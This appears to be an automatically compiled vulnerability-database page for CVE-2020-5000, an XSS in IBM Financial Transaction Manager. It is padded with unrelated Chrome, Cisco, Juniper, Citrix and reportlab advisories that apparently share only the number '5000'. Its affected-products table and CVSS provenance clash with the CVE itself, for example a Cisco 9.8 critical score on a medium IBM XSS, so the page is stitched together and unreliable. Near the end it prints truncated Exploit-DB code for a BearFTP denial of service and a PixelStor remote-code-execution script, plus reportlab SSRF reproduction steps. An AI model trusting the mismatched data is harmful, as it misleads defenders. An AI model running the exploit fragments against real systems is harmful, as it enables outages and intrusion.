CVE-2020-5000
published 2021-06-15CVE-2020-5000: IBM Financial Transaction Manager 3.2.0 through 3.2.8 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code…
PriorityP423medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EPSS
0.47%
37.8th percentile
IBM Financial Transaction Manager 3.2.0 through 3.2.8 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192952.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chrome_chrome | — | — | |
| ibm | financial_transaction_manager | — | — |
| ibm | financial_transaction_manager | — | — |
| ibm | financial_transaction_manager | >= 3.2.0 < 3.2.8 | 3.2.8 |
| juniper | junos_os | — | — |
| juniper | qfx_series | — | — |
| reportlab | reportlab | >= 0 < 3.5.55 | 3.5.55 |
CVSS provenance
nvdv3.15.4MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
vendor_cisco9.8CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xv9g-pwqj-hpwc: IBM Financial Transaction Manager 3
ghsa_unreviewed·2022-05-24
CVE-2020-5000 [MEDIUM] CWE-79 GHSA-xv9g-pwqj-hpwc: IBM Financial Transaction Manager 3
IBM Financial Transaction Manager 3.0.2 and 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192952.
GHSA
Server-side Request Forgery (SSRF) via img tags in reportlab
ghsa·2021-03-29
CVE-2020-28463 [HIGH] CWE-918 Server-side Request Forgery (SSRF) via img tags in reportlab
Server-side Request Forgery (SSRF) via img tags in reportlab
All versions of package reportlab at time of writing are vulnerable to Server-side Request Forgery (SSRF) via img tags. In order to reduce risk, use trustedSchemes & trustedHosts (see in Reportlab's documentation)
Steps to reproduce by Karan Bamal:
1. Download and install the latest package of reportlab
2. Go to demos -> odyssey -> dodyssey
3. In the text file odyssey.txt that needs to be converted to pdf inject ``
4. Create a nc listener `nc -lp 5000`
5. Run python3 dodyssey.py
6. You will get a hit on your nc showing we have successfully proceded to send a server side request
7. dodyssey.py will show error since there is no img file on the url, but we are able to do SSRF
Chrome
Stable Channel Update for Desktop: CVE-2021-30532
vendor_chrome·2021-05-25·CVSS 4.3
CVE-2021-30532 [MEDIUM] Stable Channel Update for Desktop: CVE-2021-30532
Stable Channel Update for Desktop
CVE-2021-30532: Insufficient policy enforcement in Content Security Policy. Reported by Philip Papurt on 2020-08-18 [$5000][ 1145553 ] Medium CVE-2021-30533: Insufficient policy enforcement in PopupBlocker
Reported by Eliya Stein on 2020-11-04 [$3000][ 1151507 ] Medium CVE-2021-30534: Insufficient policy enforcement in iFrameSandbox
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2021-21228
vendor_chrome·2021-04-26·CVSS 4.3
CVE-2021-21228 [MEDIUM] Stable Channel Update for Desktop: CVE-2021-21228
Stable Channel Update for Desktop
CVE-2021-21228: Insufficient policy enforcement in extensions. Reported by Rob Wu on 2020-10-16 [$5000][ 1193233 ] Medium CVE-2021-4324: Insufficient policy enforcement in Google Update
Reported by Abdelhamid Naceri (halov) on 2021-03-28 [$TBD][ 1198165 ] Medium CVE-2021-21229: Incorrect security UI in downloads
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2021-21168
vendor_chrome·2021-03-02·CVSS 6.5
CVE-2021-21168 [MEDIUM] Stable Channel Update for Desktop: CVE-2021-21168
Stable Channel Update for Desktop
CVE-2021-21168: Insufficient policy enforcement in appcache. Reported by Luan Herrera (@lbherrera_) on 2020-11-24 [$5000][ 1166138 ] Medium CVE-2021-21169: Out of bounds memory access in V8
Reported by Bohan Liu (@P4nda20371774) and Moon Liang of Tencent Security Xuanwu Lab on 2021-01-13 [$3000][ 1111646 ] Medium CVE-2021-21170: Incorrect security UI in Loader
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2021-21145
vendor_chrome·2021-02-02·CVSS 8.8
CVE-2021-21145 [HIGH] Stable Channel Update for Desktop: CVE-2021-21145
Stable Channel Update for Desktop
CVE-2021-21145: Use after free in Fonts. Reported by Anonymous on 2020-12-03 [$TBD][ 1161705 ] High CVE-2021-21146: Use after free in Navigation
Reported by Alison Huffman and Choongwoo Han of Microsoft Browser Vulnerability Research on 2020-12-24 [$5000][ 1162942 ] Medium CVE-2021-21147: Inappropriate implementation in Skia
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2021-21120
vendor_chrome·2021-01-19·CVSS 8.8
CVE-2021-21120 [HIGH] Stable Channel Update for Desktop: CVE-2021-21120
Stable Channel Update for Desktop
CVE-2021-21120: Use after free in WebSQL. Reported by Nan Wang(@eternalsakura13) and Guang Gong of 360 Alpha Lab on 2020-12-21 [$5000][ 1161143 ] High CVE-2021-21121: Use after free in Omnibox
Reported by Leecraso and Guang Gong of 360 Alpha Lab on 2020-12-22 [$5000][ 1162131 ] High CVE-2021-21122: Use after free in Blink
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2021-21117
vendor_chrome·2021-01-19·CVSS 7.8
CVE-2021-21117 [CRITICAL] Stable Channel Update for Desktop: CVE-2021-21117
Stable Channel Update for Desktop
CVE-2021-21117: Insufficient policy enforcement in Cryptohome. Reported by Rory McNamara on 2020-10-10 [$16000][ 1161357 ] High CVE-2021-21118: Insufficient data validation in V8
Reported by Tyler Nighswander (@tylerni7) of Theori on 2020-12-23 [$5000][ 1160534 ] High CVE-2021-21119: Use after free in Media
Severity: critical
Chrome
Stable Channel Update for Desktop: CVE-2020-16027
vendor_chrome·2020-11-17·CVSS 6.5
CVE-2020-16027 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-16027
Stable Channel Update for Desktop
CVE-2020-16027: Insufficient policy enforcement in developer tools. Reported by David Erceg on 2020-08-14 [$5000][ 1138446 ] Medium CVE-2020-16028: Heap buffer overflow in WebRTC
Reported by asnine on 2020-10-14 [$3000][ 1134338 ] Medium CVE-2020-16029: Inappropriate implementation in PDFium
Severity: medium
Cisco
Cisco IOS XR Software Slow Path Forwarding Denial of Service Vulnerability
vendor_cisco·2020-11-10·CVSS 8.6
CVE-2020-26070 [HIGH] CWE-404 Cisco IOS XR Software Slow Path Forwarding Denial of Service Vulnerability
Cisco IOS XR Software Slow Path Forwarding Denial of Service Vulnerability
A vulnerability in the egress packet processing function of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers and Cisco Network Convergence System (NCS) 5000 Series Routers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
The vulnerability is due to improper resource allocation when an affected device processes network traffic in software switching mode. An attacker could exploit this vulnerability by sending specific streams of Layer 2 or Layer 3 protocol data units (PDUs) to an affected device. A successful exploit could cause the affected device to run out of buffer resources, which could make the device unable to proc
Chrome
Stable Channel Update for Desktop: CVE-2020-16004
vendor_chrome·2020-11-02·CVSS 8.8
CVE-2020-16004 [HIGH] Stable Channel Update for Desktop: CVE-2020-16004
Stable Channel Update for Desktop
CVE-2020-16004: Use after free in user interface. Reported by Leecraso and Guang Gong of 360 Alpha Lab working with 360 BugCloud on 2020-10-15 [$15000][ 1139398 ] High CVE-2020-16005: Insufficient policy enforcement in ANGLE
Reported by Jaehun Jeong(@n3sk) of Theori on 2020-10-16 [$5000][ 1133527 ] High CVE-2020-16006: Inappropriate implementation in V8
Severity: high
Juniper
CVE-2020-1685: When configuring stateless firewall filters in Juniper Networks EX4600 and QFX 5000 Series devices using Virtual Extensible LAN protocol (VXLAN), the
vendor_juniper·2020-10-16·CVSS 5.8
CVE-2020-1685 [MEDIUM] CWE-203 CVE-2020-1685: When configuring stateless firewall filters in Juniper Networks EX4600 and QFX 5000 Series devices using Virtual Extensible LAN protocol (VXLAN), the
CVE-2020-1685: When configuring stateless firewall filters in Juniper Networks EX4600 and QFX 5000 Series devices using Virtual Extensible LAN protocol (VXLAN), the discard action will fail to discard traffic under certain conditions. Given a firewall filter configuration similar to: family ethernet-switching { filter L2-VLAN { term ALLOW { from { user-vlan-id 100; } then { accept; } } term NON-MATCH { then { discard; } } when there is only one term containing a 'user-vlan-id' match condition, and no other terms in the firewall filter except discard, the discard action for non-matching traffic will only discard traffic with the same VLAN ID specified under 'user-vlan-id'. Other traffic (e.g. VLAN ID 200) will not be discarded. This unexpected behavior can lead to unintended traffic passing
Cisco
Cisco StarOS Privilege Escalation Vulnerability
vendor_cisco·2020-10-07·CVSS 4.4
CVE-2020-3601 [MEDIUM] CWE-20 Cisco StarOS Privilege Escalation Vulnerability
Cisco StarOS Privilege Escalation Vulnerability
A vulnerability in the CLI of Cisco StarOS operating system for Cisco ASR 5000 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device.
The vulnerability is due to insufficient input validation of CLI commands. An attacker could exploit this vulnerability by sending crafted commands to the CLI. A successful exploit could allow the attacker to execute arbitrary code with the privileges of the root user. To exploit this vulnerability, an attacker would need to have valid administrative credentials on an affected device.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
This advisory is available at the following link:ht
Cisco
Cisco StarOS Privilege Escalation Vulnerability
vendor_cisco·2020-10-07·CVSS 6.3
CVE-2020-3602 [MEDIUM] CWE-20 Cisco StarOS Privilege Escalation Vulnerability
Cisco StarOS Privilege Escalation Vulnerability
A vulnerability in the CLI of Cisco StarOS operating system for Cisco ASR 5000 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device.
The vulnerability is due to insufficient input validation of CLI commands. An attacker could exploit this vulnerability by sending crafted commands to the CLI. A successful exploit could allow the attacker to execute arbitrary code with the privileges of the root user on the affected device. To exploit this vulnerability, an attacker would need to have valid credentials on an affected device and know the password for the cli test-commands command.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vu
Chrome
Stable Channel Update for Desktop: CVE-2020-15967
vendor_chrome·2020-10-06·CVSS 8.8
CVE-2020-15967 [CRITICAL] Stable Channel Update for Desktop: CVE-2020-15967
Stable Channel Update for Desktop
CVE-2020-15967: Use after free in payments. Reported by Man Yue Mo of GitHub Security Lab on 2020-09-11 [$5000][ 1126424 ] High CVE-2020-15968: Use after free in Blink
Reported by Anonymous on 2020-09-09 [$500][ 1124659 ] High CVE-2020-15969: Use after free in WebRTC
Severity: critical
Chrome
Stable Channel Update for Desktop: CVE-2020-15978
vendor_chrome·2020-10-06·CVSS 8.8
CVE-2020-15978 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-15978
Stable Channel Update for Desktop
CVE-2020-15978: Insufficient data validation in navigation. Reported by Luan Herrera (@lbherrera_) on 2020-08-14 [$5000][ 1127319 ] Medium CVE-2020-15979: Inappropriate implementation in V8
Reported by Avihay Cohen @ SeraphicAlgorithms on 2020-09-11 [$3000][ 1092453 ] Medium CVE-2020-15980: Insufficient policy enforcement in Intents
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2020-6557
vendor_chrome·2020-10-06·CVSS 6.5
CVE-2020-6557 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6557
Stable Channel Update for Desktop
CVE-2020-6557: Inappropriate implementation in networking. Reported by Matthias Gierlings and Marcus Brinkmann (NDS Ruhr-University Bochum) on 2020-05-15 [$5000][ 1097724 ] Medium CVE-2020-15977: Insufficient data validation in dialogs
Reported by Narendra Bhati (https://twitter
Severity: medium
Citrix
Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update
vendor_citrix·2020-09-18·CVSS 6.1
CVE-2020-8245 [MEDIUM] CWE-269 Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update
Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update
of Problem Multiple vulnerabilities have been discovered in Citrix ADC (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. These vulnerabilities, if exploited, could result in the following security issues: CVE ID Description Vulnerability Type
CVE References: CVE-2020-8245, CVE-2020-8246, CVE-2020-8247
Affected Products: Citrix ADC, Citrix Application Delivery Controller, Citrix Gateway, Citrix SD-WAN WANOP, NetScaler ADC, NetScaler Gateway, XenServer, sd-wan
Severity: Medium
Remediation:
Fixed builds have been released for supported versions of Citrix ADC, Citrix Ga
Chrome
Stable Channel Update for Desktop: CVE-2020-6558
vendor_chrome·2020-08-25·CVSS 6.5
CVE-2020-6558 [HIGH] Stable Channel Update for Desktop: CVE-2020-6558
Stable Channel Update for Desktop
CVE-2020-6558: Insufficient policy enforcement in iOS. Reported by Alison Huffman, Microsoft Browser Vulnerability Research on 2020-07-24 [$TBD][ 1116706 ] High CVE-2020-6559: Use after free in presentation API
Reported by Liu Wei and Wu Zekai of Tencent Security Xuanwu Lab on 2020-08-15 [$5000][ 1108181 ] Medium CVE-2020-6560: Insufficient policy enforcement in autofill
Severity: high
Cisco
Cisco vWAAS for Cisco ENCS 5400-W Series and CSP 5000-W Series Default Credentials Vulnerability
vendor_cisco·2020-08-19·CVSS 9.8
CVE-2020-3446 [CRITICAL] CWE-798 Cisco vWAAS for Cisco ENCS 5400-W Series and CSP 5000-W Series Default Credentials Vulnerability
Cisco vWAAS for Cisco ENCS 5400-W Series and CSP 5000-W Series Default Credentials Vulnerability
A vulnerability in Cisco Virtual Wide Area Application Services (vWAAS) with Cisco Enterprise NFV Infrastructure Software (NFVIS)-bundled images for Cisco ENCS 5400-W Series and CSP 5000-W Series appliances could allow an unauthenticated, remote attacker to log into the NFVIS CLI of an affected device by using accounts that have a default, static password.
The vulnerability exists because the affected software has user accounts with default, static passwords. An attacker with access to the NFVIS CLI of an affected device could exploit this vulnerability by logging into the CLI. A successful exploit could allow the attacker to access the NFVIS CLI with administrator privileges.
Cisco has relea
Chrome
Stable Channel Update for Desktop: CVE-2020-6544
vendor_chrome·2020-08-10·CVSS 8.8
CVE-2020-6544 [HIGH] Stable Channel Update for Desktop: CVE-2020-6544
Stable Channel Update for Desktop
CVE-2020-6544: Use after free in media. Reported by Tim Becker of Theori on 2020-07-22
[$5000][ 1095584 ] High CVE-2020-6545: Use after free in audio
Reported by Anonymous on 2020-06-16
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2020-6510
vendor_chrome·2020-07-14·CVSS 7.8
CVE-2020-6510 [CRITICAL] Stable Channel Update for Desktop: CVE-2020-6510
Stable Channel Update for Desktop
CVE-2020-6510: Heap buffer overflow in background fetch. Reported by Leecraso and Guang Gong of 360 Alpha Lab working with 360 BugCloud on 2020-07-08
[$5000][ 1074317 ] High CVE-2020-6511: Side-channel information leakage in content security policy
Reported by Mikhail Oblozhikhin on 2020-04-24
Severity: critical
Cisco
Cisco ASR 5000 Series Aggregation Services Routers Enhanced Charging Service Rule Bypass Vulnerability
vendor_cisco·2020-06-17·CVSS 5.3
CVE-2020-3244 [MEDIUM] CWE-20 Cisco ASR 5000 Series Aggregation Services Routers Enhanced Charging Service Rule Bypass Vulnerability
Cisco ASR 5000 Series Aggregation Services Routers Enhanced Charging Service Rule Bypass Vulnerability
A vulnerability in the Enhanced Charging Service (ECS) functionality of Cisco ASR 5000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to bypass the traffic classification rules on an affected device.
The vulnerability is due to insufficient input validation of user traffic going through an affected device. An attacker could exploit this vulnerability by sending a malformed HTTP request to an affected device. A successful exploit could allow the attacker to bypass the traffic classification rules and potentially avoid being charged for traffic consumption.
Cisco has released software updates that address this vulnerability. There are no workarounds th
Chrome
Stable Channel Update for Desktop: CVE-2020-6496
vendor_chrome·2020-06-03·CVSS 8.8
CVE-2020-6496 [HIGH] Stable Channel Update for Desktop: CVE-2020-6496
Stable Channel Update for Desktop
CVE-2020-6496: Use after free in payments. Reported by Khalil Zhani on 2020-05-24 [$5000][ 1086124 ] Medium CVE-2020-6508: Use after free in login screen
Reported by Leecraso and Guang Gong of 360 Alpha Lab on 2020-05-25
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2020-6469
vendor_chrome·2020-05-19·CVSS 9.6
CVE-2020-6469 [HIGH] Stable Channel Update for Desktop: CVE-2020-6469
Stable Channel Update for Desktop
CVE-2020-6469: Insufficient policy enforcement in developer tools. Reported by David Erceg on 2020-04-02
[$5000][ 1065761 ] Medium CVE-2020-6470: Insufficient validation of untrusted input in clipboard
Reported by Michał Bentkowski of Securitum on 2020-03-30
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2020-6454
vendor_chrome·2020-04-07·CVSS 8.8
CVE-2020-6454 [HIGH] Stable Channel Update for Desktop: CVE-2020-6454
Stable Channel Update for Desktop
CVE-2020-6454: Use after free in extensions. Reported by Leecraso and Guang Gong of Alpha Lab, Qihoo 360 on 2019-10-29
[$5000][ 1043446 ] High CVE-2020-6423: Use after free in audio
Reported by Anonymous on 2020-01-18
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2020-6393
vendor_chrome·2020-02-04·CVSS 6.5
CVE-2020-6393 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6393
Stable Channel Update for Desktop
CVE-2020-6393: Insufficient policy enforcement in Blink. Reported by Mark Amery on 2019-12-17
[$5000][ 999001 ] Medium CVE-2020-6499: Inappropriate implementation in AppCache
Reported by Kevin Higgs (@themalwareman) on 2019-08-29
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2020-6391
vendor_chrome·2020-02-04·CVSS 4.3
CVE-2020-6391 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6391
Stable Channel Update for Desktop
CVE-2020-6391: Insufficient validation of untrusted input in Blink. Reported by Michał Bentkowski of Securitum on 2019-10-24
[$5000][ 1030411 ] Medium CVE-2020-6392: Insufficient policy enforcement in extensions
Reported by Microsoft Edge Team on 2019-12-03
Severity: medium
Cisco
Cisco StarOS Privilege Escalation Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3601 Cisco StarOS Privilege Escalation Vulnerability
CVE-2020-3601: Cisco StarOS Privilege Escalation Vulnerability
A vulnerability in the CLI of Cisco StarOS operating system for Cisco ASR 5000 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device. The vulnerability is due to insufficient input validation of CLI commands. An attacker could exploit this vulnerability by sending crafted commands to the CLI. A successful exploit could allow the attacker to execute arbitrary code with the privileges of the root user. To exploit this vulnerability, an attacker would need to have valid administrative credentials on an affected device. Cisco has released software updates that address this vulnerability. There are no
CVSS: 3.1
CWE: CWE-20, CWE-20
Bug IDs: CSCvv34214
Cisco
Cisco vWAAS for Cisco ENCS 5400-W Series and CSP 5000-W Series Default Credentials Vulnerability
vendor_cisco·CVSS 3.0
CVE-2020-3446 Cisco vWAAS for Cisco ENCS 5400-W Series and CSP 5000-W Series Default Credentials Vulnerability
CVE-2020-3446: Cisco vWAAS for Cisco ENCS 5400-W Series and CSP 5000-W Series Default Credentials Vulnerability
A vulnerability in Cisco Virtual Wide Area Application Services (vWAAS) with Cisco Enterprise NFV Infrastructure Software (NFVIS)-bundled images for Cisco ENCS 5400-W Series and CSP 5000-W Series appliances could allow an unauthenticated, remote attacker to log into the NFVIS CLI of an affected device by using accounts that have a default, static password. The vulnerability exists because the affected software has user accounts with default, static passwords. An attacker with access to the NFVIS CLI of an affected device could exploit this vulnerability by logging into the CLI. A successful exploit could allow the attacker to access the NFVIS CLI with administrator privileges. Ci
Cisco
Cisco ASR 5000 Series Aggregation Services Routers Enhanced Charging Service Rule Bypass Vulnerability
vendor_cisco·CVSS 3.0
CVE-2020-3244 Cisco ASR 5000 Series Aggregation Services Routers Enhanced Charging Service Rule Bypass Vulnerability
CVE-2020-3244: Cisco ASR 5000 Series Aggregation Services Routers Enhanced Charging Service Rule Bypass Vulnerability
A vulnerability in the Enhanced Charging Service (ECS) functionality of Cisco ASR 5000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to bypass the traffic classification rules on an affected device. The vulnerability is due to insufficient input validation of user traffic going through an affected device. An attacker could exploit this vulnerability by sending a malformed HTTP request to an affected device. A successful exploit could allow the attacker to bypass the traffic classification rules and potentially avoid being charged for traffic consumption. Cisco has released software updates that address this vulnerability. There are no
C
Cisco
Cisco StarOS Privilege Escalation Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3602 Cisco StarOS Privilege Escalation Vulnerability
CVE-2020-3602: Cisco StarOS Privilege Escalation Vulnerability
A vulnerability in the CLI of Cisco StarOS operating system for Cisco ASR 5000 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device. The vulnerability is due to insufficient input validation of CLI commands. An attacker could exploit this vulnerability by sending crafted commands to the CLI. A successful exploit could allow the attacker to execute arbitrary code with the privileges of the root user on the affected device. To exploit this vulnerability, an attacker would need to have valid credentials on an affected device and know the password for the cli test-commands command. Cisco has released software updates that address this vulnerability. There are no
CVSS: 3.1
CWE: CWE-
Cisco
Cisco IOS XR Software Slow Path Forwarding Denial of Service Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-26070 Cisco IOS XR Software Slow Path Forwarding Denial of Service Vulnerability
CVE-2020-26070: Cisco IOS XR Software Slow Path Forwarding Denial of Service Vulnerability
A vulnerability in the egress packet processing function of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers and Cisco Network Convergence System (NCS) 5000 Series Routers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper resource allocation when an affected device processes network traffic in software switching mode. An attacker could exploit this vulnerability by sending specific streams of Layer 2 or Layer 3 protocol data units (PDUs) to an affected device. A successful exploit could cause the affected device to run out of buffer resources, which could make the device
No detection rules found.
Exploit-DB
BearFTP 0.1.0 - 'PASV' Denial of Service
exploitdb·2020-02-03·CVSS 7.5
CVE-2020-8416 [HIGH] BearFTP 0.1.0 - 'PASV' Denial of Service
BearFTP 0.1.0 - 'PASV' Denial of Service
---
# Exploit Title: BearFTP 0.1.0 - 'PASV' Denial of Service
# Date: 2020-01-29
# Exploit Author: kolya5544
# Vendor Homepage: http://iktm.me/
# Software Link: https://github.com/kolya5544/BearFTP/releases
# Version: v0.0.1 - v0.1.0
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-8416
static void Main(string[] args)
{
Console.WriteLine("DoS started. Approx. time to complete: 204 seconds.");
for (int i = 0; i
{
Thread.CurrentThread.IsBackground = true;
TcpClient exploit = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it.
var ns = exploit.GetStream();
StreamWriter sw = new StreamWriter(ns);
sw.AutoFlush = true;
StreamReader sr = new StreamReader(ns);
while (true)
{
Thread.Sleep(5000); //We just spend our time.
}
}).Start()
Exploit-DB
PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution
exploitdb·2020-01-10·CVSS 9.8
CVE-2020-6756 [CRITICAL] PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution
PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution
---
# Exploit Title: PixelStor 5000 - Remote Code Execution
# Product: PixelStor 5000
# Vendor: Rasilient
# Date: 2020-01-08
# Exploit Author: .:UND3R:.
# Vendor Homepage: http://rasilient.com
# Version: K:4.0.1580-20150629 (KDI Version)
# Tested on: K:4.0.1580-20150629 (KDI Version)
# CVE: CVE-2020-6756
# URL Author: https://pwnedchile.com
# Thanks: Dani Pelotocino \n")
sys.exit(1)
if __name__ == "__main__":
url = sys.argv[1]
cmd = raw_input("\n[Linux Command]:")
poc(url, cmd)
#EoF
No writeups or analysis indexed.
2021-06-15
Published